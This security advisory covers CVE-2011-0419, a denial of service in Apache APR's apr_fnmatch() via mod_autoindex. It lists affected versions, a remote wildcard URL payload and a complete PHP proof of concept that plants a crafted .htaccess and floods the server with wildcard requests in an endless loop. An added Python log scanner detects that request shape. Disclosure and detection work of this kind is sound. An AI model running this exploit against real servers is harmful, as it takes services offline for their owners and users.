Release date:
Updated on:
Affected Systems:
NetBSD 4.x
Apache Group Apache Software Foundation 2.x
Apache Group APR 1.4.3
Apache Group APR 1.4.2
Unaffected system:
Apache Group Apache Software Foundation 2.2.18
Apache Group APR 1.4.4
Description:
--------------------------------------------------------------------------------
Bugtraq id: 47820
Cve id: CVE-2011-0419
APR (Apache Portable Runtime) is a library that gives upper-layer applications a portable low-level support interface, so that the same code can run across multiple operating system platforms.
Apache APR's "apr_fnmatch()" has a denial of service vulnerability. A remote attacker can exploit it to cause a denial of service.
Source: Maksymilian Arciemowicz (max@jestsuper.pl)
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
<?php
/*
Apache 2.2.17 mod_autoindex local/remote Denial of Service
Author: Maksymilian Arciemowicz
CVE-2011-0419
CWE: CWE-399

REMOTE
Find some directory with mod_autoindex enabled on the server. The directory should contain long filenames.
http://[server]/[directory_with_mod_autoindex]/?P=*?*?*?[up to 4k]

LOCAL
Tested on:
127# httpd -v && uname -a
Server version: Apache/2.2.17 (Unix)
Server built:   Dec 28 2010 13:21:44
NetBSD localhost 5.1 NetBSD 5.1 (GENERIC) #0: Sun Nov  7 14:39:56 UTC 2010  builds@b6.netbsd.org:/home/builds/AB/netbsd-5-1-RELEASE/i386/201011061943Z-obj/home/builds/AB/netbsd-5-1-RELEASE/src/sys/arch/i386/compile/GENERIC i386

Result:
127# ls -la
total 8
drwxrwxrwx  2 root  wheel   512 Feb  8 .
drwxr-xr-x  7 www   wheel  1024 Jan 31 ..
-rw-r--r--  1 www   wheel  1056 Feb  8 .htaccess
-rw-r--r--  1 www   wheel     0 Feb  8 cx.............................................................................................................................
-rw-r--r--  1 www   wheel  1240 Feb  8 run.php
127# ps -aux -p 617
USER  PID %CPU %MEM   VSZ  RSS TTY STAT STARTED TIME COMMAND
www   617 98.6  0.4 10028 4004 ?   R    pm. 17 /usr/pkg/sbin/httpd -k start

Time = 12:43 and counting

Where http://[$localhost]:[$localport]/[$localuri]
*/

$localhost = "localhost";
$localport = 80;
$localuri  = "/koniec/";

if (!is_writable(".")) die("! writable");

// Phase 1
// Create some filename (the long dotted name shown in the ls output above)
touch("cx" . str_repeat(".", 125));

// Phase 2
// Create .htaccess with an AddDescription pattern made of 512 "*." pairs
unlink("./.htaccess");
$htaccess = fopen("./.htaccess", "w"); // "w" mode assumed; the mode string was missing from the published listing
fwrite($htaccess, "AddDescription \"CVE-2011-0419\" " . str_repeat('*.', 512) . "\n");
fclose($htaccess);

// Phase 3
// Local connect (bypass firewall restriction)
while (1) {
    $fp = fsockopen($localhost, $localport, $errno, $errstr, 30);
    if (!$fp) echo "$errstr ($errno)<br />\n";
    else {
        $out  = "GET " . $localuri . "/?P=" . str_repeat("*?", 1500) . "* HTTP/1.1\r\n";
        $out .= "Host: " . $localhost . "\r\n";
        $out .= "Connection: Close\r\n\r\n";
        fwrite($fp, $out);
        fclose($fp);
    }
}
?>
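As an added defender-side example, not part of the advisory or the author's PoC: a small Python scanner over Apache combined-format access log entries that flags autoindex requests whose P= parameter carries an unusual number of fnmatch wildcards, the request shape used in the test method above. The sample log lines, the thresholds and the detection logic are my assumptions, not anything from the page or the Apache project.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache combined log format; only client, timestamp and request target are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)

# Assumed thresholds: a legitimate autoindex filter such as P=*.txt uses a
# handful of wildcards; thousands of "*?" pairs only make sense as an attack.
MAX_WILDCARDS = 20
MAX_PATTERN_LEN = 256

def pattern_stats(target):
    """Return (wildcard_count, length) for the autoindex P= parameter, or None.
    parse_qs percent-decodes, so %2A/%3F encoded wildcards are counted too."""
    query = urlsplit(target).query
    patterns = parse_qs(query, keep_blank_values=True).get("P")
    if not patterns:
        return None
    worst = max(patterns, key=len)
    return worst.count("*") + worst.count("?"), len(worst)

def scan(lines):
    """Return a list of (client_ip, wildcards, length) for requests over the thresholds."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        stats = pattern_stats(m.group("target"))
        if stats is None:
            continue
        wild, plen = stats
        if wild > MAX_WILDCARDS or plen > MAX_PATTERN_LEN:
            hits.append((m.group("ip"), wild, plen))
    return hits

# Constructed sample lines: a normal filter, a CVE-2011-0419-style request, an unrelated hit.
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Feb/2011:12:43:01 +0000] "GET /koniec/?P=*.php HTTP/1.1" 200 1234',
    '10.0.0.9 - - [08/Feb/2011:12:43:02 +0000] "GET /koniec/?P='
    + "*?" * 1500 + '* HTTP/1.1" 200 0',
    '10.0.0.7 - - [08/Feb/2011:12:43:03 +0000] "GET /index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, wild, plen in scan(SAMPLE_LOG):
        print(f"{ip}: P= pattern with {wild} wildcards, {plen} bytes")
```

Pair this with the vendor patch rather than relying on it alone: it only surfaces the request shape, while the fixed APR/httpd removes the underlying cost.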
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Apache Group
----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://httpd.apache.org/